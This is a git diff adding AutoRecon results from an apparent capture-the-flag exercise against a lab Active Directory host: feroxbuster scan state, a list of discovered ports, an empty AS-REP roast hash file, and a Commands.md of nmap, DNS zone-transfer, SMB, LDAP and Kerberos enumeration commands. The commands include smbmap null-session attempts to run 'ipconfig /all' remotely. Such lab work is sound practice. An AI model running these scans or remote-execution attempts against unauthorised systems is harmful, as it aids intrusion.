31/CVS/text/","normalized_url":"http://10.129.243.131/CVS/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"afb07d7bdff44414a8184420bd330e77","url":"http://10.129.243.131/CVS/text/css","normalized_url":"http://10.129.243.131/CVS/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"851db73660fa47709b315e88932f5c61","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"652dab299a6045e0bd3e7ce168cf7bef","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"d6467b8752394e9c91037814ffc40cf9","url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","normalized_url":"http://10.129.243.131/_vti_bin/_vti_adm/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"9d77e48ae1a749e2a6eda6a69a9aa853","url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css","normalized_url":"http://10.129.243.131/_vti_bin/_vti_aut/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e60310109bb642f9a8072f90dd66296d","url":"http://10.129.243.131/_vti_bin/text/css","normalized_url":"http://10.129.243.131/_vti_bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c8b6036f78334b3ea8b9864af3e8bb19","url":"http://10.129.243.131/_vti_bin/text/","normalized_url":"http://10.129.243.131/_vti_bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0ff327c7b32c4308958e018b90ba7fe0","url":"http://10.129.243.131/android/text/","normalized_url":"http://10.129.243.131/android/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"20ffbdd5b7484a0cba1704aeebc63111","url":"http://10.129.243.131/android/text/css","normalized_url":"http://10.129.243.131/android/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"869cee124fc54b3784e986709e4f89bb","url":"http://10.129.243.131/api/text/css","normalized_url":"http://10.129.243.131/api/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e779936b7a624aea95e7f4aa040df421","url":"http://10.129.243.131/api/experiments/text/","normalized_url":"http://10.129.243.131/api/experiments/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"1075320433124adda1d6f355f6b4e6f3","url":"http://10.129.243.131/api/experiments/text/css","normalized_url":"http://10.129.243.131/api/experiments/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"dbb0024e529c42c89914719cb54b3628","url":"http://10.129.243.131/api/text/","normalized_url":"http://10.129.243.131/api/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"94f7ec3044c7451e979d5e3b7a7e236a","url":"http://10.129.243.131/cgi-bin/text/","normalized_url":"http://10.129.243.131/cgi-bin/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"cea6f3f3a737419e94d10f14146f9758","url":"http://10.129.243.131/cgi-bin/text/css","normalized_url":"http://10.129.243.131/cgi-bin/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"3839e0a97e7e4fec83ea4b9640bc61dc","url":"http://10.129.243.131/federation/text/css","normalized_url":"http://10.129.243.131/federation/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"a7555d65e45144a9b3b24a99664d2789","url":"http://10.129.243.131/federation/text/","normalized_url":"http://10.129.243.131/federation/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8cd8579744c84f17bd3857421a72f467","url":"http://10.129.243.131/ios/text/","normalized_url":"http://10.129.243.131/ios/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"df34b24b9eb348fba623cf7c65e0a629","url":"http://10.129.243.131/ios/text/css","normalized_url":"http://10.129.243.131/ios/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ce2cfbd99a594b0d9b8e1f366e397c00","url":"http://10.129.243.131/mfa/text/","normalized_url":"http://10.129.243.131/mfa/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"c573be1f27a84c0d9bf4ab3159a8e159","url":"http://10.129.243.131/mfa/text/css","normalized_url":"http://10.129.243.131/mfa/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"be8aeb2062db44a4b43808aca4915002","url":"http://10.129.243.131/oauth/text/","normalized_url":"http://10.129.243.131/oauth/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"b391907c71a44d1aaa6ea7044c15bcca","url":"http://10.129.243.131/oauth/text/css","normalized_url":"http://10.129.243.131/oauth/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"e3210ec8d76e4b92acb11be52cf001a3","url":"http://10.129.243.131/oauth/device/text/css","normalized_url":"http://10.129.243.131/oauth/device/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0f84c6da10064b50a6daeb87ec48ef3a","url":"http://10.129.243.131/oauth/device/text/","normalized_url":"http://10.129.243.131/oauth/device/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"4bca1f7ac3da46078a45d8df91cac6c7","url":"http://10.129.243.131/oauth/token/text/","normalized_url":"http://10.129.243.131/oauth/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"666b0e7248d54391aec3970842cc8ce3","url":"http://10.129.243.131/oauth/token/text/css","normalized_url":"http://10.129.243.131/oauth/token/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"00e94dec348b40d48fd0c6e0032833d8","url":"http://10.129.243.131/oidc/text/","normalized_url":"http://10.129.243.131/oidc/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"65e28d2f09ac4351a1647eed00ca6777","url":"http://10.129.243.131/oidc/text/css","normalized_url":"http://10.129.243.131/oidc/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"8ae71645bf82449fbe516854a791aedc","url":"http://10.129.243.131/servlet/text/css","normalized_url":"http://10.129.243.131/servlet/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"492f31b4c98f4ff082b471ddadc9bc2b","url":"http://10.129.243.131/servlet/text/","normalized_url":"http://10.129.243.131/servlet/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"f24a0b5e5b1b47eb97e1e39325733d2a","url":"http://10.129.243.131/token/text/css","normalized_url":"http://10.129.243.131/token/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0bf1f3c3709347a29b773cce4142953d","url":"http://10.129.243.131/token/text/","normalized_url":"http://10.129.243.131/token/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"0db5e881d72d48ada67955256fbded64","url":"http://10.129.243.131/v1/text/css","normalized_url":"http://10.129.243.131/v1/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"731da94d800046b68281f0e00d3dce0d","url":"http://10.129.243.131/v1/text/","normalized_url":"http://10.129.243.131/v1/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"6464d059fd104ad693dc951109999b1c","url":"http://10.129.243.131/v2/text/","normalized_url":"http://10.129.243.131/v2/text/","scan_type":"File","status":"NotStarted","num_requests":833000},{"id":"ade8a1306c3f4ccfa6e157960a19c64c","url":"http://10.129.243.131/v2/text/css","normalized_url":"http://10.129.243.131/v2/text/css/","scan_type":"File","status":"NotStarted","num_requests":833000}],"config":{"type":"configuration","wordlist":"/root/.local/share/AutoRecon/wordlists/dirbuster.txt","config":"/etc/feroxbuster/ferox-config.toml","proxy":"","replay_proxy":"","target_url":"http://10.129.243.131:80/","status_codes":[200,204,301,302,307,308,401,403,405,500],"replay_codes":[200,204,301,302,307,308,401,403,405,500],"filter_status":[],"threads":10,"timeout":7,"verbosity":1,"silent":false,"quiet":true,"auto_bail":false,"auto_tune":false,"json":false,"output":"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt","debug_log":"","user_agent":"feroxbuster/2.7.3","random_agent":false,"redirects":false,"insecure":true,"extensions":["txt","html","php","asp","aspx","jsp"],"methods":["GET"],"data":[],"headers":{},"queries":[],"no_recursion":true,"extract_links":true,"add_slash":false,"stdin":false,"depth":4,"scan_limit":0,"parallel":0,"rate_limit":0,"filter_size":[],"filter_line_count":[],"filter_word_count":[],"filter_regex":[],"dont_filter":false,"resumed":false,"resume_from":"","save_state":true,"time_limit":"","filter_similar":[],"url_denylist":[],"regex_denylist":[],"collect_extensions":false,"dont_collect":["tif","tiff","ico","cur","bmp","webp","svg","png","jpg","jpeg","jfif","gif","avif","apng","pjpeg","pjp","mov","wav","mpg","mpeg","mp3","mp4","m4a","m4p","m4v","ogg","webm","ogv","oga","flac","aac","3gp","css","zip","xls","xml","gz","tgz"],"collect_backups":false,"collect_words":false,"force_recursion":false},"responses":[{"type":"response","url":"http://10.129.243.131/script.js","original_url":"http://10.129.243.131/script.js","path":"/script.js","wildcard":false,"status":200,"method":"GET","content_length":692,"line_count":25,"word_count":72,"headers":{"accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-type":"application/javascript","server":"Microsoft-IIS/10.0","content-length":"692","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/style.css","original_url":"http://10.129.243.131/style.css","path":"/style.css","wildcard":false,"status":200,"method":"GET","content_length":3166,"line_count":215,"word_count":294,"headers":{"last-modified":"Fri, 20 Aug 2021 13:41:48 GMT","content-type":"text/css","accept-ranges":"bytes","date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"3166","etag":"\"0767d1fc995d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/","original_url":"http://10.129.243.131:80/","path":"/","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"date":"Sat, 28 Oct 2023 12:22:06 GMT","content-length":"1034","accept-ranges":"bytes","content-type":"text/html","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","etag":"\"0eaf6d7c895d71:0\"","server":"Microsoft-IIS/10.0"},"extension":""},{"type":"response","url":"http://10.129.243.131/Index.html","original_url":"http://10.129.243.131:80/","path":"/Index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-length":"1034","content-type":"text/html","server":"Microsoft-IIS/10.0","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","date":"Sat, 28 Oct 2023 12:22:17 GMT","accept-ranges":"bytes","etag":"\"0eaf6d7c895d71:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/LICENSE.txt","original_url":"http://10.129.243.131:80/","path":"/LICENSE.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\"","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:22:17 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT"},"extension":""},{"type":"response","url":"http://10.129.243.131/Search.php","original_url":"http://10.129.243.131:80/","path":"/Search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","date":"Sat, 28 Oct 2023 12:22:19 GMT","content-type":"text/html; charset=UTF-8","server":"Microsoft-IIS/10.0","content-length":"116"},"extension":""},{"type":"response","url":"http://10.129.243.131/index.html","original_url":"http://10.129.243.131:80/","path":"/index.html","wildcard":false,"status":200,"method":"GET","content_length":1034,"line_count":41,"word_count":66,"headers":{"content-type":"text/html","etag":"\"0eaf6d7c895d71:0\"","accept-ranges":"bytes","last-modified":"Fri, 20 Aug 2021 13:39:48 GMT","server":"Microsoft-IIS/10.0","date":"Sat, 28 Oct 2023 12:23:36 GMT","content-length":"1034"},"extension":""},{"type":"response","url":"http://10.129.243.131/license.txt","original_url":"http://10.129.243.131:80/","path":"/license.txt","wildcard":false,"status":200,"method":"GET","content_length":1092,"line_count":8,"word_count":168,"headers":{"content-type":"text/plain","date":"Sat, 28 Oct 2023 12:23:47 GMT","content-length":"1092","last-modified":"Mon, 16 Nov 2020 19:54:58 GMT","server":"Microsoft-IIS/10.0","accept-ranges":"bytes","etag":"\"0958b5c52bcd61:0\""},"extension":""},{"type":"response","url":"http://10.129.243.131/search.php","original_url":"http://10.129.243.131:80/","path":"/search.php","wildcard":false,"status":200,"method":"GET","content_length":116,"line_count":1,"word_count":14,"headers":{"x-powered-by":"PHP/8.0.0","server":"Microsoft-IIS/10.0","content-length":"116","content-type":"text/html; charset=UTF-8","date":"Sat, 28 Oct 2023 12:24:30 GMT"},"extension":""}],"statistics":{"type":"statistics","timeouts":70,"requests":135013,"expected_per_scan":833000,"total_expected":833385,"errors":70,"successes":12,"redirects":0,"client_errors":134931,"server_errors":0,"total_scans":1,"initial_targets":0,"links_extracted":55,"extensions_collected":0,"status_200s":12,"status_301s":0,"status_302s":0,"status_401s":0,"status_403s":0,"status_429s":0,"status_500s":0,"status_503s":0,"status_504s":0,"status_508s":0,"wildcards_filtered":0,"responses_filtered":0,"resources_discovered":9,"url_format_errors":0,"redirection_errors":0,"connection_errors":0,"request_errors":0,"directory_scan_times":[],"total_runtime":[0.0]},"collected_extensions":[],"filters":[]} \ No newline at end of file diff --git a/LaokoonHaxorcist/fullpwn/hashes.asreproast b/LaokoonHaxorcist/fullpwn/hashes.asreproast new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/local.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt new file mode 100644 index 00000000..1c35dda7 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/notes.txt @@ -0,0 +1,244 @@ +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] msrpc found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] unknown found on tcp/49667. + + + +[*] unknown found on tcp/49673. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] unknown found on tcp/49695. + + + +[*] unknown found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] ntp found on udp/123. + + + +[*] domain found on tcp/53. + + + +[*] http found on tcp/80. + + + +[*] kerberos-sec found on tcp/88. + + + +[*] msrpc found on tcp/135. + + + +[*] netbios-ssn found on tcp/139. + + + +[*] ldap found on tcp/389. + + + +[*] microsoft-ds found on tcp/445. + + + +[*] kpasswd5 found on tcp/464. + + + +[*] ncacn_http found on tcp/593. + + + +[*] tcpwrapped found on tcp/636. + + + +[*] ldap found on tcp/3268. + + + +[*] tcpwrapped found on tcp/3269. + + + +[*] wsman found on tcp/5985. + + + +[*] mc-nmf found on tcp/9389. + + + +[*] msrpc found on tcp/49667. + + + +[*] ncacn_http found on tcp/49674. + + + +[*] msrpc found on tcp/49695. + + + +[*] msrpc found on tcp/49843. + + + +[*] domain found on udp/53. + + + +[*] kerberos-sec found on udp/88. + + + +[*] ntp found on udp/123. + + + diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/proof.txt new file mode 100644 index 00000000..e69de29b diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md new file mode 100644 index 00000000..65f369e2 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Commands.md @@ -0,0 +1,177 @@ +```bash +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN 